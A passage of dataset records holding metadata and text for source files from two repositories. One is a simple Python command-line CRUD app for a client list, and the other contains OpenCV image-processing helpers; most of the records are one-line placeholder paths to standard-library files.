"blob_id": "170217831764e8c95afbea2b1c64db0749aa1c5a",
"content_id": "fbcdbf83eced23c9385a2efe0ab8d6d5f0fa3da5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 1,
"path": "/env/lib/python3.6/sre_compile.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/sre_compile.py"
},
{
"alpha_fraction": 0.7843137383460999,
"alphanum_fraction": 0.843137264251709,
"avg_line_length": 51,
"blob_id": "c1f3d5ffe0655a3114ea73c5a582a9b927b20bf1",
"content_id": "817e61fc011f9af0c8991b07ee225f54a88f1943",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 1,
"path": "/env/lib/python3.6/posixpath.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/posixpath.py"
},
{
"alpha_fraction": 0.760869562625885,
"alphanum_fraction": 0.8260869383811951,
"avg_line_length": 46,
"blob_id": "596c11832abebec9ae42489e6775d93dde78ddff",
"content_id": "b445f363983d97e73371cc52550cc6aec1daccbc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 46,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 1,
"path": "/env/lib/python3.6/hmac.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/hmac.py"
},
{
"alpha_fraction": 0.7799999713897705,
"alphanum_fraction": 0.8399999737739563,
"avg_line_length": 50,
"blob_id": "7d90bec230ce4e2f178d53cb35de72a6178932df",
"content_id": "bc6423bdd67bbe88faabaffb3269767c9d0f64fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 1,
"path": "/env/lib/python3.6/warnings.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/warnings.py"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 44,
"blob_id": "ecfeefa038016682d3fe2023cedb636552f7c589",
"content_id": "229463dde9cc0faf7ee6ffc598ed32c6db8c6a50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 44,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 1,
"path": "/env/lib/python3.6/os.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/os.py"
},
{
"alpha_fraction": 0.760869562625885,
"alphanum_fraction": 0.8260869383811951,
"avg_line_length": 46,
"blob_id": "168d5d30efe8a50fafb2ba84b0cf8b6292702bbf",
"content_id": "ef7b26c2d4310b64c485e99f5c57d4ee7c2c444d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 46,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 1,
"path": "/env/lib/python3.6/copy.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/copy.py"
},
{
"alpha_fraction": 0.7755101919174194,
"alphanum_fraction": 0.8367347121238708,
"avg_line_length": 49,
"blob_id": "4a9031b12cf6d66e0db6ca956a1eaa44eec914b2",
"content_id": "d7b8c8a6c637819ec711f2ca7379e6f4d4b66742",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 49,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 1,
"path": "/env/lib/python3.6/copyreg.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/copyreg.py"
},
{
"alpha_fraction": 0.7843137383460999,
"alphanum_fraction": 0.843137264251709,
"avg_line_length": 51,
"blob_id": "ad8cdab4e0c4b5b560fd2af0e2c3529ef7334e4c",
"content_id": "28c562db70489585047610d51a9b84f9e4d67c0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 1,
"path": "/env/lib/python3.6/functools.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/functools.py"
},
{
"alpha_fraction": 0.7818182110786438,
"alphanum_fraction": 0.8363636136054993,
"avg_line_length": 55,
"blob_id": "8748eb49788573e8d197dd839a877a545b14eeef",
"content_id": "09a270f37bbc884ff9eacaa0a4fb55b7a7162afb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 1,
"path": "/env/lib/python3.6/sre_constants.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/sre_constants.py"
},
{
"alpha_fraction": 0.7659574747085571,
"alphanum_fraction": 0.8297872543334961,
"avg_line_length": 47,
"blob_id": "daf9a9f0a286a59a82c209bc78fa75255e70f4c9",
"content_id": "7fb31b6cb25bffb99cf544e1172faac843f9c754",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 47,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 1,
"path": "/env/lib/python3.6/token.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/token.py"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 44,
"blob_id": "f78387ac265fb9f5f467b7eff302a0e7dfecdac1",
"content_id": "65be6392aef5b2aaeea5f5063138cf394e8356d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 44,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 1,
"path": "/env/lib/python3.6/re.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/re.py"
},
{
"alpha_fraction": 0.7636363506317139,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 55,
"blob_id": "707470fb478665590ca7609e5da09e98152b2603",
"content_id": "00d2ffd27ec5fc7aa0d57c73b02e1f5ace69cdbb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 1,
"path": "/env/lib/python3.6/_dummy_thread.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/_dummy_thread.py"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 48,
"blob_id": "99a15e61161ac10402ffbfa891d9ce99797b2138",
"content_id": "e6a8d8dbb872abd0d89df672ea5e36b89b48b098",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 1,
"path": "/env/lib/python3.6/shutil.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/shutil.py"
},
{
"alpha_fraction": 0.7755101919174194,
"alphanum_fraction": 0.8367347121238708,
"avg_line_length": 49,
"blob_id": "c0ceeb6a7ea2472f61bb4deb971e083835411889",
"content_id": "0b8342dfa248427910dc087fcfeb4ef4696fb893",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 49,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 1,
"path": "/env/lib/python3.6/keyword.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/keyword.py"
},
{
"alpha_fraction": 0.7843137383460999,
"alphanum_fraction": 0.843137264251709,
"avg_line_length": 51,
"blob_id": "75d0d3e8a72ea990f249fdea06f9814663ec457c",
"content_id": "4def4c29125292956d6114f51347ce9c8ab738c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 1,
"path": "/env/lib/python3.6/linecache.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/linecache.py"
},
{
"alpha_fraction": 0.7735849022865295,
"alphanum_fraction": 0.8301886916160583,
"avg_line_length": 53,
"blob_id": "6fff2c7c6a3d3b5fa9b57a985fc81ef02210a281",
"content_id": "a40cefca22e844e54c758cb6ec6eae238d2a9255",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 1,
"path": "/env/lib/python3.6/_weakrefset.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/_weakrefset.py"
},
{
"alpha_fraction": 0.7115384340286255,
"alphanum_fraction": 0.7692307829856873,
"avg_line_length": 52,
"blob_id": "bd92038f49bc49c3ee82ec679cda3d6036f753a3",
"content_id": "768f3128c9b47fd54329cf8ddc675724aeac7105",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 1,
"path": "/env/lib/python3.6/__future__.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/__future__.py"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 44,
"blob_id": "a77d9f011054bb318e8d48e1030eca5492abf220",
"content_id": "88d28dc171737835affbf6c125f63e5feb1e8eeb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 44,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 1,
"path": "/env/lib/python3.6/io.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/io.py"
},
{
"alpha_fraction": 0.7647058963775635,
"alphanum_fraction": 0.8235294222831726,
"avg_line_length": 51,
"blob_id": "5aa16f19c51b284156b1712cb72f46810e245e4f",
"content_id": "897f8e21991641c97ef90e76b4a3f6fc9a21b65a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 1,
"path": "/env/lib/python3.6/sre_parse.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/sre_parse.py"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 48,
"blob_id": "47cf3053db432a8f553d9f1630e55b3c3ec0f306",
"content_id": "a45f809dd37006f5610fdbccef9b247035840c2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 1,
"path": "/env/lib/python3.6/bisect.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/bisect.py"
},
{
"alpha_fraction": 0.7291666865348816,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 48,
"blob_id": "44e34cc0d0d2bf35d847aa3c056dc25535a1ffc9",
"content_id": "7e59a702681543941b33592191f0a29b2e23efe3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 1,
"path": "/env/lib/python3.6/base64.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/base64.py"
},
{
"alpha_fraction": 0.7735849022865295,
"alphanum_fraction": 0.8301886916160583,
"avg_line_length": 53,
"blob_id": "c0c566d8463a93d9f51ae14cc1f24894fa5075f6",
"content_id": "ce4213c1be984d201fa250f7ed77158accca50fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 1,
"path": "/env/lib/python3.6/_bootlocale.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/_bootlocale.py"
},
{
"alpha_fraction": 0.7755101919174194,
"alphanum_fraction": 0.8367347121238708,
"avg_line_length": 49,
"blob_id": "ef0d2d2e20b9b3b83209898e6f09bd9938b5a13c",
"content_id": "a490087e656bd7369926ced0d59479af46d8dd06",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 49,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 1,
"path": "/env/lib/python3.6/tarfile.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/tarfile.py"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 48,
"blob_id": "2b1326a99bf523c207728db68fe2dedaed1542c9",
"content_id": "d5c266c031acbb3d45471a0e2baab5a3ec30e173",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 1,
"path": "/env/lib/python3.6/ntpath.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/ntpath.py"
},
{
"alpha_fraction": 0.760869562625885,
"alphanum_fraction": 0.8260869383811951,
"avg_line_length": 46,
"blob_id": "4389616a26f6107dee8efdce6d7459c3ba00531e",
"content_id": "032a07a627aae0b275890e8f45242b4dc879881b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 46,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 1,
"path": "/env/lib/python3.6/stat.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/stat.py"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 48,
"blob_id": "5a6d518158414eee0ecdd70b7810d9332c1b25b9",
"content_id": "5f221fa4a0f4c4292d9b3370c7445b3789cc66ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 1,
"path": "/env/lib/python3.6/struct.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/struct.py"
},
{
"alpha_fraction": 0.7555555701255798,
"alphanum_fraction": 0.8222222328186035,
"avg_line_length": 45,
"blob_id": "ecb9ca3195d1d21f4b7847666af5d3ca97e86a7c",
"content_id": "ad5ef1f41279dcc5c5cbde14f844ee1585074ad8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 45,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 1,
"path": "/env/lib/python3.6/abc.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/abc.py"
},
{
"alpha_fraction": 0.7924528121948242,
"alphanum_fraction": 0.849056601524353,
"avg_line_length": 53,
"blob_id": "65d638ea1b50e25e6eaab61ece8dfbc3df82ec73",
"content_id": "2d55b8ab106e62f3fbf5d1de2463b4e1884f9d6c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 1,
"path": "/env/lib/python3.6/rlcompleter.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/rlcompleter.py"
},
{
"alpha_fraction": 0.760869562625885,
"alphanum_fraction": 0.8260869383811951,
"avg_line_length": 46,
"blob_id": "bd630e163c907bfdec5b80f4230255678c62a479",
"content_id": "625e755d9af5a9dff2050a37680b37b089e4212d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 46,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 1,
"path": "/env/lib/python3.6/enum.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/enum.py"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 48,
"blob_id": "3c66c0d12e0f6d2289d2bbab18adfb49cc458529",
"content_id": "71a38f8d117fb474eea7955a19a03c1144002430",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 1,
"path": "/env/lib/python3.6/random.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/random.py"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 48,
"blob_id": "ad67e9a00ffb05b39d73b20512aea80e75013a78",
"content_id": "27e4f8e69f25556a1d0b8b593e254e987138aa7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 1,
"path": "/env/lib/python3.6/codecs.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/codecs.py"
},
{
"alpha_fraction": 0.7755101919174194,
"alphanum_fraction": 0.8367347121238708,
"avg_line_length": 49,
"blob_id": "136a74884d1d99318d0609965189ac104c310464",
"content_id": "712f2333993e42b56a60097ddca406e006fb682f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 49,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 1,
"path": "/env/lib/python3.6/fnmatch.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/fnmatch.py"
},
{
"alpha_fraction": 0.7659574747085571,
"alphanum_fraction": 0.8297872543334961,
"avg_line_length": 47,
"blob_id": "606a7244ae169ad5fc417cc93c8bce01945a811e",
"content_id": "c91eb69c425c07d6253ddbb68c4d79925e8d8189",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 47,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 1,
"path": "/env/lib/python3.6/heapq.py",
"repo_name": "trialrepo/python-flask-formio-gcp",
"src_encoding": "UTF-8",
"text": "/Users/bhavana/anaconda3/lib/python3.6/heapq.py"
}
] | 42 |
j-luis996/crud_python-dic | https://github.com/j-luis996/crud_python-dic | 6729ba555e03a7ba5f06c2468284bb24b6ab01b5 | d7274f14d37d9ecc76842daa2c6d2ff8b17eb6d0 | fca0e7a39a441567b57baf019737bd9fd77e2993 | refs/heads/main | 2023-06-08T22:53:37.814038 | 2021-07-06T07:34:41 | 2021-07-06T07:34:41 | 383,322,584 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8032786846160889,
"alphanum_fraction": 0.8032786846160889,
"avg_line_length": 29.5,
"blob_id": "fbfc82d1552d2e8c24672350fdbb36210e776209",
"content_id": "7dcf3d8f764a4e1a9675a416e7997d7d2d8a34a3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 61,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 2,
"path": "/README.md",
"repo_name": "j-luis996/crud_python-dic",
"src_encoding": "UTF-8",
"text": "# crud_python-dic\ncrud in python with dictionaries and lists\n"
},
{
"alpha_fraction": 0.5391342639923096,
"alphanum_fraction": 0.5400087237358093,
"avg_line_length": 29.50666618347168,
"blob_id": "298e512e35a9b878e8fdd77be3e9e37e3d6346f1",
"content_id": "60e8c6bc4eb1289c3ee11bc1a2ff5ea073eaeaf8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2287,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 75,
"path": "/crud.py",
"repo_name": "j-luis996/crud_python-dic",
"src_encoding": "UTF-8",
"text": "from ej import search_client\nimport const\n\nclass crud:\n def __get_client_field(self, field_name, message = \"What's the client {}? \"):\n field = None\n\n while not field:\n field = input(message.format(field_name))\n return field\n\n\n def __get_client_from_user(self):\n client = {\n 'name': self.__get_client_field(field_name = 'name'),\n 'company': self.__get_client_field(field_name = 'company'),\n 'email': self.__get_client_field(field_name = 'email'),\n 'position': self.__get_client_field(field_name = 'position'),\n }\n\n return client\n\n\n def __add_client(self, client):\n if client in const.clients:\n print(\"Client alredy in client's list\")\n else:\n const.clients.append(client)\n\n\n def create_client(self):\n client = self.__get_client_from_user()\n self.__add_client(client)\n print('Added client successful')\n\n\n def read_clients(self):\n print('uid | name | company | email | position')\n print('*' * 50)\n\n for idx, client in enumerate(const.clients):\n print(f'{idx} | {client[\"name\"]} | {client[\"company\"]} | {client[\"email\"]} | {client[\"position\"]}')\n\n\n def update_client(self):\n id_client = int(self.__get_client_field(field_name=\"id\"))\n if id_client < len(const.clients):\n client_update = self.__get_client_from_user()\n const.clients[id_client] = client_update\n print(\"Client updated in client's list\")\n else:\n print('id invalid')\n\n\n def delete_client(self):\n id_client = int(self.__get_client_field(field_name=\"id\"))\n if id_client < len(const.clients):\n for idx, client in enumerate(const.clients):\n if idx == id_client:\n del const.clients[idx] \n break\n print(\"Client deleted in client's list\")\n else:\n print('id invalid')\n\n\n def search_client(self, data, key = \"name\"):\n client_exist = False\n for client in const.clients:\n if client[key] ==data:\n client_exist = True\n break\n else:\n continue\n return client_exist"
},
{
"alpha_fraction": 0.48184019327163696,
"alphanum_fraction": 0.48184019327163696,
"avg_line_length": 13.785714149475098,
"blob_id": "232a604b0554b1b98b68ae71b7e6b6f4827b6cee",
"content_id": "2966ba23a3a147d839747b9d11e1bd190a8cf369",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 413,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 28,
"path": "/const.py",
"repo_name": "j-luis996/crud_python-dic",
"src_encoding": "UTF-8",
"text": "menu = \"\"\"\nWelcome to my fist CRUD in python\n\nplease choose any option\n\n[C] create\n[R] read\n[U] update\n[D] delete\n[S] search for name\n\n[E] exit\n\"\"\"\n\nclients = [\n {\n 'name': 'jorge',\n 'company': 'Upiita',\n 'email': '[email protected]',\n 'position': \"student\"\n },\n {\n 'name': 'carlos',\n 'company': 'Upiita',\n 'email': '[email protected]',\n 'position': \"teacher\"\n },\n]"
},
{
"alpha_fraction": 0.4852631688117981,
"alphanum_fraction": 0.4852631688117981,
"avg_line_length": 22.774999618530273,
"blob_id": "9009dc0d949db210c653bf8b1154291fc56b78dd",
"content_id": "65d605e4d17eabf73933f46a65b512b20db6a4d4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 950,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 40,
"path": "/main.py",
"repo_name": "j-luis996/crud_python-dic",
"src_encoding": "UTF-8",
"text": "import os\nimport const\nimport crud\n\n\ncrud = crud.crud()\ndef main():\n command = None\n\n while command != 'E':\n os.system('clear')\n\n print(const.menu)\n\n command = input()\n command = command.upper()\n\n if command == 'C':\n crud.create_client()\n elif command == 'R':\n crud.read_clients()\n elif command == 'U':\n crud.update_client()\n elif command == 'D':\n crud.delete_client()\n elif command == 'S':\n name = input('What is the client name? ')\n if crud.search_client(name):\n print(\"The client is in the client's list\")\n else:\n print(f\"The client: {name} is not in our client's list\")\n else:\n if command != 'E':\n print('command invalid')\n if command != 'E':\n input('press any key for continue')\n\n\nif __name__ == \"__main__\":\n main()"
}
] | 4 |
mbettinger/yemen-bombings-tracking | https://github.com/mbettinger/yemen-bombings-tracking | 7a228bf925a2cf274bb7dff9b249ecc74fffe3f5 | a7028f9af24063ac4fe179d5ec2c65cff270edea | adfdd597ac0bd2f259944909da7a0e99077500d3 | refs/heads/master | 2023-01-10T16:34:12.948821 | 2020-11-10T10:09:45 | 2020-11-10T10:09:45 | 263,365,415 | 0 | 0 | null | 2020-05-12T14:46:36 | 2020-11-02T09:39:42 | 2020-11-10T10:09:46 | null | [
{
"alpha_fraction": 0.5574193596839905,
"alphanum_fraction": 0.6219354867935181,
"avg_line_length": 27.740739822387695,
"blob_id": "b53c29f45ac6e902445f3ae47308f69b49fa1443",
"content_id": "7037e175d5af104fb13f90afbe5f7bec2c09b4a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 775,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 27,
"path": "/contours.py",
"repo_name": "mbettinger/yemen-bombings-tracking",
"src_encoding": "UTF-8",
"text": "import imutils\nimport cv2\nimport numpy as np\n\nimage = cv2.imread(\"data/processed/1_target.jpg\")\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\nblurred = cv2.GaussianBlur(gray, (5, 5), 0)\nthresh = cv2.threshold(blurred, 60, 255, cv2.THRESH_BINARY)[1]\n\ncnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,\n\tcv2.CHAIN_APPROX_SIMPLE)\ncnts = imutils.grab_contours(cnts)\n\nfor c in cnts:\n try:\n rect=cv2.minAreaRect(c)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n cv2.drawContours(image,[box],0,(0,0,255),2)\n M = cv2.moments(c)\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n\n cv2.drawContours(image, [c], -1, (0, 255, 0), 2)\n except Exception as e:\n print(e)\ncv2.imwrite(\"image.png\",image)"
},
{
"alpha_fraction": 0.5593400597572327,
"alphanum_fraction": 0.5955295562744141,
"avg_line_length": 35.153846740722656,
"blob_id": "775b8e15960ad246d7abf62bea44c916388232c7",
"content_id": "12c04a96cd31b806473675143ea2ee6305e2a58d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1879,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 52,
"path": "/utils.py",
"repo_name": "mbettinger/yemen-bombings-tracking",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\n\ndef histogram_equalization(img_in):\n # segregate color streams\n b, g, r = cv2.split(img_in)\n h_b, bin_b = np.histogram(b.flatten(), 256, [0, 256])\n h_g, bin_g = np.histogram(g.flatten(), 256, [0, 256])\n h_r, bin_r = np.histogram(r.flatten(), 256, [0, 256])\n # calculate cdf\n cdf_b = np.cumsum(h_b)\n cdf_g = np.cumsum(h_g)\n cdf_r = np.cumsum(h_r)\n\n # mask all pixels with value=0 and replace it with mean of the pixel values\n cdf_m_b = np.ma.masked_equal(cdf_b, 0)\n cdf_m_b = (cdf_m_b - cdf_m_b.min()) * 255 / (cdf_m_b.max() - cdf_m_b.min())\n cdf_final_b = np.ma.filled(cdf_m_b, 0).astype('uint8')\n\n cdf_m_g = np.ma.masked_equal(cdf_g, 0)\n cdf_m_g = (cdf_m_g - cdf_m_g.min()) * 255 / (cdf_m_g.max() - cdf_m_g.min())\n cdf_final_g = np.ma.filled(cdf_m_g, 0).astype('uint8')\n cdf_m_r = np.ma.masked_equal(cdf_r, 0)\n cdf_m_r = (cdf_m_r - cdf_m_r.min()) * 255 / (cdf_m_r.max() - cdf_m_r.min())\n cdf_final_r = np.ma.filled(cdf_m_r, 0).astype('uint8')\n # merge the images in the three channels\n img_b = cdf_final_b[b]\n img_g = cdf_final_g[g]\n img_r = cdf_final_r[r]\n\n img_out = cv2.merge((img_b, img_g, img_r))\n # validation\n equ_b = cv2.equalizeHist(b)\n equ_g = cv2.equalizeHist(g)\n equ_r = cv2.equalizeHist(r)\n equ = cv2.merge((equ_b, equ_g, equ_r))\n # print(equ)\n # cv2.imwrite('output_name.png', equ)\n return img_out\n\ndef image_difference(img1, img3, t_up=196, t_down=128) :\n img_diff = np.ndarray(shape=img1.shape, dtype='float32')\n img_diff.fill(128)\n img_diff += (img1 - img3)\n img_diff -= img_diff.min()\n img_diff *= (255/img_diff.max())\n # plt.imshow(PIL.Image.fromarray((img_diff).astype(np.uint8)))\n # plt.imshow(PIL.Image.fromarray(img_diff))\n # plt.show()\n placement = (img_diff > t_down) * (img_diff < t_up)\n\n return img_diff, placement"
},
{
"alpha_fraction": 0.6149019598960876,
"alphanum_fraction": 0.6274510025978088,
